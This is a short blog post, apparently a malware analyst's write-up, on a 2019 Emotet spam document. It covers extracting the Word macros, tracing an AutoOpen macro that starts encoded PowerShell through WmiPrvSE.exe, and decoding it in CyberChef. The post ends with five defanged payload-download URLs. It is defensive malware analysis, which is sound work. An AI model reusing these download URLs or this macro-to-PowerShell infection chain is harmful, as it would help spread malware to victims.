Emotet! (09-16-2019) – Document Analysis

jamesbrown2.jpg

No, not like James Brown, but after a long summer of lounging by the Black Sea, Emotet has started spamming once again. I’ll be working off of this document here.


Using OfficeMalScanner, we can rip out the macros from the document. We can see the typical Sub autoopen() kicking things off. Looking through the code we can see it creating objects and sewing various variables together.

Emotet3.png

Opening the document, we can see the new document theme. It’s from here that we can step through the macros and see how they’re all working together.Emotet2.png

While it can be interesting to step through the document, I’ve explained how to do that on this blog before. I created a stripped down version where I pulled out the main pieces of code that actually do anything. The “powershell -enco…” string is in green. wpLnXI starts WmiPrvSE.exe which calls up powershell in turn.

Emotet.png

So while the macro has changed up a bit since last spring, the encoded powershell certainly hasn’t. Let’s decode that base-64 code using CyberChef.

Emotet4.png

Once again, this is not overly complicated. After you’ve undone the base-64 string, use Remove null bytes to clean it up. Split and Extract URLs will complete the job and you ought to be good to go!

hxxp://think1.com/wp-content/upgrade/2na4-4q5g-751619964/
hxxp://broadpeakdefense.com/fbsgf/McZcBMeM/
hxxps://lecairtravels.com/wp-admin/bXwjcdeg/
hxxps://www.biyunhui.com/fj/wbTKndf/
hxxp://nautcoins.com/wp-includes/AcZxFxQ/

Thanks for reading.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s